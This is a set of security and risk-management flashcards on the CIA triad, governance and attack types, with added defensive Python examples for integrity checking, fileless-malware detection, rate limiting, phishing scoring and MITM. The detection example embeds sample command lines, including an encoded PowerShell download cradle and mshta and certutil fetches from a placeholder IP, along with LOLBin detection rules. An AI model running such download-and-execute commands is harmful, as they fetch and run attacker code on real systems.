Security & Risk Management Flashcards

1
Q

focuses on information systems, aiming to
reduce the impact and likelihood of threats such as
cyberattacks, employee mistakes, and natural disasters.

A

Cyber risk management

1
Q

involve identifying,
assessing, and controlling risks to an organization’s capital,
earnings, and critical assets

A

Security and risk management

2
Q

These risks can arise from
various sources, including financial uncertainty, legal
liabilities, strategic management errors, accidents, and natural disasters.

A

Security and risk management

3
Q

is a guiding model in information security. A comprehensive information security strategy includes policies and security controls that minimize threats to these three crucial components.

A

Confidentiality, Integrity and Availability (the CIA triad)

4
Q

refers to protecting information from unauthorized access or disclosure.

A

Confidentiality

5
Q

means data are trustworthy and complete and have not been altered, whether accidentally or by an unauthorized user. Integrity controls (hashes, MACs, digital signatures) exist to make any such change detectable.

A

Integrity

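The integrity card above says modified data must be detectable. The following is an added example, not part of the original flashcards, showing one way to do that for a set of files: hash every file into a manifest, then protect the manifest with an HMAC so an intruder who can rewrite files cannot also rewrite the record of their hashes. The file names, their contents and DEMO_KEY are constructed for the demo; in practice the key comes from a secret store the intruder cannot read.

```python
"""Added example: an integrity check that detects unauthorized modification of files.
Not from the original flashcards. File names, contents and the key are constructed
for the demo; in practice the key comes from a secret store the attacker cannot read."""
import hashlib
import hmac
import json
import os
import tempfile

DEMO_KEY = b"demo-only-manifest-key"   # assumption: provisioned out of band


def file_digest(path):
    """SHA-256 of one file, streamed so large files are not loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root):
    """{relative path: sha256} for every file under root."""
    entries = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            entries[os.path.relpath(full, root)] = file_digest(full)
    return entries


def manifest_tag(entries, key):
    """HMAC-SHA256 over the canonical manifest. Plain hashes only detect accidents;
    the keyed tag is what stops an attacker from rewriting the manifest too."""
    body = json.dumps(entries, sort_keys=True).encode()
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def build_manifest(root, key):
    entries = hash_tree(root)
    return {"entries": entries, "tag": manifest_tag(entries, key)}


def verify_manifest(root, manifest, key):
    """Report whether the manifest itself is authentic and which files changed."""
    # constant-time comparison so the tag cannot be guessed byte by byte via timing
    if not hmac.compare_digest(manifest_tag(manifest["entries"], key), manifest["tag"]):
        return {"manifest_tampered": True, "modified": [], "added": [], "removed": []}
    known, current = manifest["entries"], hash_tree(root)
    return {
        "manifest_tampered": False,
        "modified": sorted(p for p in known if p in current and current[p] != known[p]),
        "added": sorted(p for p in current if p not in known),
        "removed": sorted(p for p in known if p not in current),
    }


def demo():
    """Baseline two constructed files, then simulate an intruder's changes."""
    with tempfile.TemporaryDirectory() as root:
        for name, data in {"app.cfg": b"debug=false\n", "hosts": b"127.0.0.1 localhost\n"}.items():
            with open(os.path.join(root, name), "wb") as f:
                f.write(data)
        manifest = build_manifest(root, DEMO_KEY)
        clean = verify_manifest(root, manifest, DEMO_KEY)

        # intruder flips a setting and drops a new file
        with open(os.path.join(root, "app.cfg"), "wb") as f:
            f.write(b"debug=true\n")
        with open(os.path.join(root, "backdoor.sh"), "wb") as f:
            f.write(b"#!/bin/sh\n")
        dirty = verify_manifest(root, manifest, DEMO_KEY)

        # intruder re-hashes the tree but cannot produce a tag without DEMO_KEY
        forged = {"entries": hash_tree(root), "tag": manifest["tag"]}
        forged_result = verify_manifest(root, forged, DEMO_KEY)
    return clean, dirty, forged_result


if __name__ == "__main__":
    for result in demo():
        print(result)
```

The second verification names the edited file and the dropped file; the third shows why the tag matters: the intruder's rebuilt manifest carries the old tag, which no longer matches, so the tampering with the manifest itself is caught rather than silently accepted.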
6
Q

means data, and the systems that serve them, are accessible when you need them.

A

Availability

7
Q

Six key principles of security governance:

A
  1. Responsibility
  2. Strategy
  3. Acquisition
  4. Performance
  5. Conformance
  6. Human Behavior
8
Q

Clearly define roles and responsibilities for security across the
organization.

A

Responsibility

9
Q

Align security efforts with the overall business strategy

A

Strategy

10
Q

When acquiring new technologies or services, evaluate their
security implications.

A

Acquisition

11
Q

Continuously monitor and assess security performance.

A

Performance

12
Q

Ensure compliance with relevant regulations, standards, and
policies.

A

Conformance

13
Q

Promote secure behaviors among employees.

A

Human Behavior

14
Q

is an attempt by cybercriminals, hackers or other digital adversaries to access a computer network or system, usually for the purpose of altering, stealing, destroying or exposing information.

A

Cyberattack

15
Q

is any program or code created with the intent to do harm to a computer, network or server.

A

Malware

16
Q

an adversary encrypts a victim’s data and offers to provide a decryption key in exchange
for a payment.

A

Ransomware

17
Q

is malicious activity that runs in memory and abuses legitimate tools already present on the system (PowerShell, WMI, mshta and similar) to carry out an attack, instead of writing a malicious executable to disk; this is why file-based antivirus often misses it.

A

Fileless Malware
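Because fileless attacks leave no malicious file to scan, detection has to look at how the built-in tools are invoked. The following is an added example, not part of the original flashcards, that runs a handful of living-off-the-land rules over process-creation events and decodes PowerShell's -EncodedCommand payload so the hidden download cradle becomes visible. The events are constructed to resemble Sysmon/EDR process-creation records; the key=value layout, host names and the 203.0.113.5 address are assumptions for the demo, not a product format.

```python
"""Added example: flagging living-off-the-land (fileless) activity in process-creation logs.
Not from the original flashcards. The events are constructed to resemble Sysmon/EDR
process-creation records; the key=value layout is an assumption, not a product format."""
import base64
import re

# Each rule: (name, pattern). Patterns are matched against the command line and,
# when present, the decoded -EncodedCommand payload.
LOLBIN_RULES = [
    ("powershell_encoded_command",
     re.compile(r"powershell(\.exe)?.*\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("powershell_download_cradle",
     re.compile(r"downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biwr\b|\biex\b", re.I)),
    ("mshta_remote_script", re.compile(r"mshta(\.exe)?\s+(https?:|vbscript:|javascript:)", re.I)),
    ("regsvr32_squiblydoo", re.compile(r"regsvr32(\.exe)?.*/i:https?://.*scrobj\.dll", re.I)),
    ("rundll32_script", re.compile(r"rundll32(\.exe)?\s+(javascript:|vbscript:)", re.I)),
    ("certutil_download", re.compile(r"certutil(\.exe)?.*-urlcache.*-f\s+https?://", re.I)),
]
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 of UTF-16LE text; return the plaintext or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_event(line):
    """Parse 'key=value' pairs; CommandLine is last because it may contain spaces and '='."""
    fields = {}
    head, _, cmd = line.partition(" CommandLine=")
    for token in head.split():
        k, _, v = token.partition("=")
        fields[k] = v
    fields["CommandLine"] = cmd
    return fields


def analyze(lines):
    """Return one finding per (event, matching rule), with the decoded payload if any."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        cmd = ev.get("CommandLine", "")
        decoded = decode_encoded_command(cmd)
        haystack = cmd if decoded is None else cmd + "\n" + decoded
        for name, rx in LOLBIN_RULES:
            if rx.search(haystack):
                findings.append({"rule": name, "host": ev.get("Host"),
                                 "parent": ev.get("ParentImage"), "cmd": cmd, "decoded": decoded})
    return findings


def encode_ps(script):
    """Used only to build the sample: how an attacker hides a one-liner from casual review."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    "Host=ws01 ParentImage=explorer.exe Image=powershell.exe CommandLine=powershell.exe -NoProfile Get-Process",
    "Host=ws01 ParentImage=winword.exe Image=powershell.exe CommandLine=powershell.exe -w hidden -enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x.ps1')"),
    "Host=ws02 ParentImage=cmd.exe Image=mshta.exe CommandLine=mshta.exe http://203.0.113.5/a.hta",
    "Host=ws03 ParentImage=cmd.exe Image=certutil.exe CommandLine=certutil.exe -urlcache -split -f http://203.0.113.5/p.exe p.exe",
    "Host=ws03 ParentImage=services.exe Image=svchost.exe CommandLine=svchost.exe -k netsvcs",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["rule"], f["host"], f["parent"], f["decoded"] or f["cmd"])
```

The parent process is kept in each finding on purpose: PowerShell launched by explorer.exe is routine, PowerShell launched by winword.exe with a hidden window and an encoded command is the macro-to-cradle pattern the card is describing.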

18
Q

type of unwanted, malicious software that infects a computer or other device and collects
information about a user’s web activity without their knowledge or consent.

A

Spyware

19
Q

type of spyware that watches a user's online activity in order to determine which ads to show them. While adware is not inherently malicious, it affects the performance of a user's device and degrades the user experience.

A

Adware

20
Q

malware that appears to be legitimate software, disguised as native operating system programs or harmless files such as free downloads. Trojans are installed through social engineering techniques such as phishing or bait websites; unlike worms, they do not replicate on their own.

A

Trojan

21
Q

a self-contained program that replicates itself and spreads copies to other computers on its own, typically by exploiting vulnerabilities in network services, without needing a host program or any user action.

A

Worm

22
Q

a collection of software designed to give malicious actors hidden, privileged control of a computer, network or application. Once activated, it sets up a backdoor, may deliver additional malware, and conceals its own files and processes from the operating system's normal views.

A

Rootkits

23
Q

are tools that record what a person types on a device, capturing passwords and other sensitive input.

A

Keylogger

24
Q

Common Types of Cyberattacks

A
  1. Malware
  2. Ransomware
  3. Fileless Malware
  4. Spyware
  5. Adware
  6. Trojan
  7. Worm
  8. Rootkits
  9. Keylogger
  10. Denial of Service Attacks
  11. Phishing
  12. Spear Phishing
  13. Whaling
25
Q

is a malicious, targeted attack that floods a server, service or network with bogus traffic or requests so that it can no longer serve legitimate users, disrupting business operations. When the traffic comes from many compromised machines at once it is a distributed denial-of-service (DDoS) attack.

A

DoS Attack
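To make the flood concrete, here is an added example (not part of the original flashcards) that replays a constructed access log through a per-client sliding-window rate limiter and, separately, measures each client's peak request rate for offline detection. The IP addresses come from documentation ranges and the window and threshold values are assumptions to be tuned per service. Note the limit on the technique: a per-client cap does nothing against a distributed flood spread thinly across thousands of sources, or against a volumetric attack that saturates the link before the server sees a request.

```python
"""Added example: spotting a request flood in a web access log, and the per-client
sliding-window limit that would throttle it. Not from the original flashcards; the
log lines use documentation IP ranges and the thresholds are assumptions."""
from collections import defaultdict, deque

WINDOW_SECONDS = 10
MAX_REQUESTS_PER_WINDOW = 20   # assumption: tune per service from real traffic


def parse_line(line):
    """Constructed format 'seconds client_ip method path status' -> (seconds, client_ip)."""
    ts, ip, *_ = line.split()
    return float(ts), ip


class SlidingWindowLimiter:
    """Allow each client at most `limit` requests inside any `window`-second span."""

    def __init__(self, window=WINDOW_SECONDS, limit=MAX_REQUESTS_PER_WINDOW):
        self.window, self.limit = window, limit
        self.hits = defaultdict(deque)           # client -> timestamps still inside the window

    def allow(self, ts, client):
        q = self.hits[client]
        while q and ts - q[0] >= self.window:    # expire timestamps that fell out of the window
            q.popleft()
        if len(q) >= self.limit:
            return False                          # over budget: reject without recording
        q.append(ts)
        return True


def replay(lines, limiter=None):
    """Feed a log through the limiter; return {client: {"allowed": n, "blocked": n}}."""
    limiter = limiter or SlidingWindowLimiter()
    stats = defaultdict(lambda: {"allowed": 0, "blocked": 0})
    for line in lines:
        ts, ip = parse_line(line)
        stats[ip]["allowed" if limiter.allow(ts, ip) else "blocked"] += 1
    return dict(stats)


def peak_rates(lines, window=WINDOW_SECONDS):
    """Offline detection: the most requests each client packed into one window."""
    by_ip = defaultdict(list)
    for line in lines:
        ts, ip = parse_line(line)
        by_ip[ip].append(ts)
    peaks = {}
    for ip, times in by_ip.items():
        q, best = deque(), 0
        for t in sorted(times):
            q.append(t)
            while t - q[0] >= window:
                q.popleft()
            best = max(best, len(q))
        peaks[ip] = best
    return peaks


def build_sample_log():
    """Constructed traffic: one normal browser and one flooding source, interleaved by time."""
    lines = [f"{i:.2f} 198.51.100.7 GET /index.html 200" for i in range(30)]              # 1 req/s
    lines += [f"{5 + i * 0.01:.2f} 203.0.113.9 GET /search?q=x 200" for i in range(500)]  # 100 req/s
    lines.sort(key=lambda l: float(l.split()[0]))
    return lines


if __name__ == "__main__":
    log = build_sample_log()
    print(replay(log))
    print(peak_rates(log))
```

The normal client never trips the limit (ten requests in any ten-second window), while the flooder gets its first twenty through and the remaining 480 rejected; the peak-rate pass shows the same asymmetry (10 versus 500 in a window) and is the kind of number a detection rule would alert on.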

26
Q

type of cyberattack that uses email, SMS, phone, social media, and social engineering techniques to entice a victim to share sensitive information, such as passwords or account numbers.

A

Phishing

27
Q

type of phishing attack that targets specific individuals or organizations
typically through malicious emails.

A

Spear Phishing

28
Q

is a type of social engineering attack specifically targeting senior or C-level executive employees with the purpose of stealing money or information, or gaining access to the person's computer in order to execute further cyberattacks.

A

Whaling

29
Q

is the act of sending fraudulent text messages designed to trick individuals into sharing sensitive data such as passwords, usernames and credit card numbers.

A

Smishing

30
Q

or voice phishing, is the fraudulent use of phone calls and voice messages, pretending to be from a reputable organization, to convince individuals to reveal private information such as bank details and passwords.

A

Vishing

31
Q

is a technique through which a cybercriminal disguises themselves as a known or trusted source, for example by forging the sender address of an email, a caller ID, a website or an IP address.

A

Spoofing
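The phishing and spoofing cards above describe what the attacker does; a mail gateway has to turn those descriptions into checks. The following is an added example, not part of the original flashcards, that scores one inbound message for the common signals: a display name borrowing a trusted brand, a lookalike sender domain (digit and letter substitutions, short edit distance), a Reply-To that diverts answers elsewhere, failing SPF/DKIM/DMARC results, and credential-harvest wording. The message, the trusted-domain list and the lure phrases are constructed for the demo. One caveat the code relies on: the Authentication-Results header is trusted only because our own MX is assumed to have written it, which means the MX must strip any such header that arrives from outside.

```python
"""Added example: scoring an inbound email for spoofing and phishing indicators.
Not from the original flashcards; the message, trusted-domain list and lure
phrases are constructed for the demo."""
import email
from email import policy
from email.utils import parseaddr

# Assumption: these are the organisation's own sending domains.
TRUSTED_DOMAINS = {"example.com", "payments.example.com"}
# Substitutions attackers use to build lookalike domains; undone before comparing.
CONFUSABLE_PAIRS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("7", "t")]
LURE_PHRASES = ("verify your password", "account will be suspended", "confirm your login")


def normalize_domain(domain):
    d = domain.lower()
    for bad, good in CONFUSABLE_PAIRS:
        d = d.replace(bad, good)
    return d


def edit_distance(a, b):
    """Levenshtein distance; 1 or 2 against a trusted domain is a typosquat candidate."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain):
    """Trusted domain that `domain` imitates, or None if it is trusted or unrelated."""
    if domain in TRUSTED_DOMAINS:
        return None
    norm = normalize_domain(domain)
    for trusted in sorted(TRUSTED_DOMAINS):
        if norm == trusted or edit_distance(norm, trusted) <= 2:
            return trusted
    return None


def assess(raw):
    """Return the list of spoofing/phishing indicators found in one RFC 5322 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    from_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = from_addr.rpartition("@")[2].lower()
    reply_domain = parseaddr(msg.get("Reply-To", ""))[1].rpartition("@")[2].lower()

    # 1. Display-name spoofing: the name borrows a trusted brand, the address does not.
    brands = {t.split(".")[0] for t in TRUSTED_DOMAINS}
    if from_domain not in TRUSTED_DOMAINS and any(b in from_name.lower() for b in brands):
        findings.append("display_name_spoof")
    # 2. Lookalike (typosquat / confusable) sender domain.
    imitated = lookalike_of(from_domain)
    if imitated:
        findings.append(f"lookalike_domain:{from_domain}->{imitated}")
    # 3. Replies silently routed to a different domain than the visible sender.
    if reply_domain and reply_domain != from_domain:
        findings.append("reply_to_mismatch")
    # 4. Sender authentication. Assumption: this header was stamped by our own MX,
    #    which must strip any Authentication-Results header arriving from outside.
    auth = msg.get("Authentication-Results", "").lower()
    for mech in ("spf", "dkim", "dmarc"):
        if any(f"{mech}={r}" in auth for r in ("fail", "softfail", "permerror")):
            findings.append(f"{mech}_not_passing")
    # 5. Credential-harvest wording in the body.
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content().lower() if body is not None else ""
    if any(p in text for p in LURE_PHRASES):
        findings.append("credential_lure")
    return findings


# Constructed messages (not real mail). The first imitates the payments team from a
# lookalike domain; the second is ordinary internal mail for comparison.
SAMPLE_MESSAGE = """\
From: "Example Payments Team" <billing@examp1e.com>
Reply-To: collect@mail-relay.invalid
To: alice@example.com
Subject: Action required: confirm your login
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=examp1e.com; dkim=none; dmarc=fail
Content-Type: text/plain; charset="utf-8"

Dear customer, your account will be suspended unless you verify your password at the link below.
"""

CLEAN_MESSAGE = """\
From: "Payroll" <payroll@example.com>
To: alice@example.com
Subject: Payslip for March
Authentication-Results: mx.example.com; spf=pass; dkim=pass; dmarc=pass

Your payslip is available in the HR portal.
"""

if __name__ == "__main__":
    print(assess(SAMPLE_MESSAGE))
    print(assess(CLEAN_MESSAGE))
```

No single indicator is decisive (a legitimate newsletter may set Reply-To to a different domain), which is why the function returns the full list and leaves the block/quarantine threshold to policy.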

32
Q

is a type of cyberattack in which an attacker secretly positions themselves between two communicating parties, relaying and possibly altering their traffic, with the goal of collecting data such as passwords or banking details.

A

Man-in-the-middle (MITM) attack
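The reason a man-in-the-middle works is that the two parties have no way to tell the attacker's messages from each other's. The following is an added example, not part of the original flashcards, that simulates a Diffie-Hellman key exchange three times: unauthenticated, where Mallory swaps both public values and ends up sharing one key with Alice and another with Bob; authenticated and attacked, where the swapped value fails its HMAC check; and authenticated and honest, where both sides derive the same key. P and G form a readable toy group, far too small for real use, and the pre-shared key stands in for the certificates or PKI a real protocol would use; both are assumptions for the demo.

```python
"""Added example: an unauthenticated Diffie-Hellman exchange falling to a man-in-the-middle,
and the same exchange with authentication that detects the substitution.
Not from the original flashcards. P and G are a readable toy group; the
pre-shared key stands in for certificates/PKI (both are assumptions)."""
import hashlib
import hmac
import secrets

P = 2**127 - 1          # toy prime modulus; real systems use a 2048-bit+ group or an EC group
G = 3
PSK = b"demo pre-shared secret known only to alice and bob"   # assumption


class Party:
    def __init__(self, name):
        self.name = name
        self.priv = secrets.randbelow(P - 2) + 1     # private exponent in [1, P-2]
        self.pub = pow(G, self.priv, P)             # public value g^priv mod p
        self.key = None

    def derive(self, peer_pub):
        """Session key = H(peer_pub ^ priv mod p)."""
        shared = pow(peer_pub, self.priv, P)
        self.key = hashlib.sha256(shared.to_bytes(16, "big")).hexdigest()
        return self.key


def unauthenticated_exchange(alice, bob, mallory):
    """Mallory sits on the wire, swaps both public values for her own, and ends up
    holding one key shared with Alice and another shared with Bob."""
    alice_sends = alice.pub
    bob.derive(mallory.pub)        # Bob receives Mallory's value and believes it is Alice's
    bob_sends = bob.pub
    alice.derive(mallory.pub)      # Alice receives Mallory's value and believes it is Bob's
    return {
        "alice": alice.key,
        "bob": bob.key,
        "mallory_with_alice": mallory.derive(alice_sends),
        "mallory_with_bob": mallory.derive(bob_sends),
    }


def tag(sender, pub):
    """Authenticate a public value: HMAC over sender identity and value under the PSK."""
    return hmac.new(PSK, sender.encode() + b"|" + pub.to_bytes(16, "big"), hashlib.sha256).digest()


def receive(claimed_sender, pub, pub_tag):
    """Accept a public value only if its tag verifies; a swapped value fails here."""
    if not hmac.compare_digest(tag(claimed_sender, pub), pub_tag):
        raise ValueError(f"public value claimed to be from {claimed_sender} failed authentication")
    return pub


def authenticated_exchange(alice, bob, mallory, attack):
    """Same exchange with tagged messages. With attack=True Mallory swaps Alice's
    value but cannot forge the tag, so Bob rejects it."""
    msg = (alice.pub, tag("alice", alice.pub))
    if attack:
        msg = (mallory.pub, msg[1])
    try:
        bob.derive(receive("alice", *msg))
    except ValueError as err:
        return {"detected": True, "reason": str(err)}
    alice.derive(receive("bob", bob.pub, tag("bob", bob.pub)))
    return {"detected": False, "keys_match": alice.key == bob.key}


def demo():
    naive = unauthenticated_exchange(Party("alice"), Party("bob"), Party("mallory"))
    attacked = authenticated_exchange(Party("alice"), Party("bob"), Party("mallory"), attack=True)
    honest = authenticated_exchange(Party("alice"), Party("bob"), Party("mallory"), attack=False)
    return naive, attacked, honest


if __name__ == "__main__":
    for result in demo():
        print(result)
```

In the unauthenticated run Alice and Bob each believe they share a key with the other, yet their keys differ and each one is held by Mallory, who can decrypt, read, re-encrypt and forward every message. TLS solves the same problem by having the server prove its identity with a certificate instead of a pre-shared key, which is why a browser's certificate warning is the MITM alarm and should not be clicked through.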

33
Q

is a technique where attackers use psychological tactics to manipulate people into taking a desired action.

A

Social Engineering

34
Q

is a type of physical security breach in which an unauthorized person follows an authorized
individual to enter secured premises

A

Tailgating